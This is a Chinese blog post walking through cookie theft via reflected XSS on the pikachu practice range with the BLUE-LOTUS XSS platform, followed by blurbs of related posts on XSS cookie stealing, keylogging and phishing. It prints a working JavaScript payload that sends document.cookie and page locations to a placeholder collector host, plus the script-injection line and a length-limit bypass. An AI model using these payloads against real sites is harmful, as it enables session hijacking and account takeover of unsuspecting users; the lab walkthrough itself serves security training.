XSS平台获取cookie

已于 2022-02-19 14:35:51 修改
阅读量3.5k 收藏 10
点赞数
分类专栏: pikachu 文章标签: xss 前端 javascript
于 2022-02-19 13:32:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41048303/article/details/123017355
版权

XSS平台获取cookie

1.环境介绍

  • 靶场:pikachu
  • XSS平台:BLUE-LOTUS
  • 浏览器:谷歌浏览器

2.流程介绍

登录XSS平台,创建获取cookie的脚本

var website = "http://网站地址";
(function() {
    (new Image()).src = website + '/?keepsession=1&location=' + escape((function() {
        try {
            return document.location.href
        } catch (e) {
            return ''
        }
    })()) + '&toplocation=' + escape((function() {
        try {
            return top.location.href
        } catch (e) {
            return ''
        }
    })()) + '&cookie=' + escape((function() {
        try {
            return document.cookie
        } catch (e) {
            return ''
        }
    })()) + '&opener=' + escape((function() {
        try {
            return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
        } catch (e) {
            return ''
        }
    })());
})();

在这里插入图片描述

登录pikachu,选择Cross-Site-Scripting下的反射型XSS(get)

在这里插入图片描述

由于输入框在前端进行了长度限制,可以选择检查进行修改

在这里插入图片描述

然后再输入框内输入payload

<script src="https:///网站地址/myjs/cookie.js"></script>

执行后就可以在XSS接收面板获取到用户的cookie信息了

在这里插入图片描述

3.遇到的问题

由于我自己搭建的平台使用的是https协议,而模板自动生成的是http所以导致不能接收到cookie信息

小白头发少
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss获取cookie方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 1789
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
XSS之截获某用户cookie信息
l31299的博客
05-28 2846
XSS反射型攻击方式实例
Web应用安全:XSS盗取cookiepayload.pptx
06-18
XSS 盗取cookie payload 4 Cookie的后利用 3 XSS 盗取cookie payload 实例演示 2 XSS 盗取cookie payload 原理分析 1 cookie简介 目录 cookie简介 Cookie 并不是它的原意“甜饼”的意思, 而是一个保存在客户机中的简单的文本文件, 这个文件与特定的 Web 文档关联在一起, 保存了该客户机访问这个Web 文档时的信息, 当客户机再次访问这个 Web 文档时这些信息可供该文档使用。 举例来说, 一个 Web 站点可能会为每一个访问者产生一个唯一的ID, 然后以 Cookie 文件的形式保存在每个用户的机器上。 也就是如果我们获取到了用户访问网站的cookie,我们就能通过这个cookie,以用户的身份访问该网站。 原理分析 攻击者将可以获取并发送管理员的cookie的恶意XSS脚本到管理员访问的网站。 当管理员访问网站的时候,恶意的XSS脚本将会被运行。 攻击者就可以接收到管理员自动发送的cookie。 原理分析 实例演示 1.攻击者发送恶意XSS脚本到网站中 本次我们使用上一节课程搭建的pikachu站点
渗透新手福利---xss获取cookie入门级
最新发布
dzqxwzoe的博客
05-14 312
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。然后我们来用这个cookie进行登入不要输入账号密码 我们用burp进行抓包 把这个cookie换成我们刚刚抓到的管理员的cookie。①1000+CTF历届题库(主流和经典的应该都有了)
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1631
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
xss获取cookie
kiihuang的博客
03-31 847
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 3675
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS测试平台.zip
08-06
XSS测试平台是测试XSS漏洞获取cookie并接收Web页面的平台
xss游戏平台源码
12-12
XSS游戏平台源码是一种基于Web技术开发的在线游戏平台的源代码,它涉及到Web开发中的多种技术,如HTML、CSS、JavaScript、PHP等。在深入探讨这些知识点之前,我们首先要理解什么是XSS(Cross-site scripting)攻击。...
搭建XSS平台所需的资料,亲测可用
09-02
4. 使用HTTPOnly cookie:设置HTTPOnly标志可以防止JavaScript读取cookie,降低凭据被盗风险。 5. 保持更新:及时修复框架和库的安全漏洞,避免已知的XSS入口点。 五、XSS平台的应用 1. 教育与培训:帮助开发者和...
XSS获取cookie和利用方式 (ASP版).txt
12-22
XSS获取cookie和利用方式简单方法
渗透测试-跨站脚本攻击xss获取cookie
lza20001103的博客
04-24 4813
渗透测试-跨站脚本攻击xss获取cookie
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3862
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss的利用,post型xss的利用  XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用:cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
XSS获取目标cookie,伪造身份获取目标权限
qq_57663276的博客
08-23 3136
未知攻,何来防。网络安全靶场学习:XSS(跨站脚本攻击),使用XSS伪造目标权限。
XSS平台cookie获取
永远是少年
11-21 1126
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
简单的利用XSS获取用户cookie
shy的博客
10-25 4274
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
使用XSS漏洞获取cookies
Decaede的博客
01-26 1007
使用XSS漏洞获取cookies
XSS攻击(1), 测试XSS漏洞, 获取cookie
探测???
10-18 1540
XSS(Cross-Site Scripting), 跨站攻击脚本, XSS漏洞发生在前端, 依赖于浏览器的解析引擎, 让前端执行攻击代码. XSS其实也算注入类的攻击, XSS代码注入需要有JavaScript编程基础.XSS的原理就是开发者没有对输入内容进行过滤, 导致通过攻击者精心构造的前端代码, 输入后和原来的前端代码产生混淆, 形成新的页面语句, 并且新的页面代码能够被浏览器解析并输出.:如果受害者具有某些特权,例如网站管理员,攻击者可能会利用XSS漏洞,使用受害者的权限对网站进行未授权的修改。
xss获取cookie攻击
07-28
回答: XSS(跨站脚本攻击)是一种攻击方式,其目的是获取用户的敏感信息,如cookie。常见的XSS攻击手段包括盗用cookie、利用植入Flash获取更高权限、以用户身份执行管理动作等。\[2\]在XSS攻击中,攻击者通过在网页中插入恶意代码,当用户访问该网页时,恶意代码会被执行,从而获取用户的cookie信息。\[3\]为了进行XSS攻击,攻击者需要搭建XSS平台,通过在后台插入恶意代码,当用户访问该后台时,恶意代码会被执行,从而获取用户的cookie信息。\[1\]请注意,XSS攻击是一种违法行为,严重侵犯了用户的隐私和安全,请勿进行此类攻击。 #### 引用[.reference_title] - *1* *2* [渗透测试-跨站脚本攻击xss获取cookie](https://blog.csdn.net/lza20001103/article/details/124385078)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [网络安全实验6 认识XSS & 盗取cookie](https://blog.csdn.net/qq_37672864/article/details/104119221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值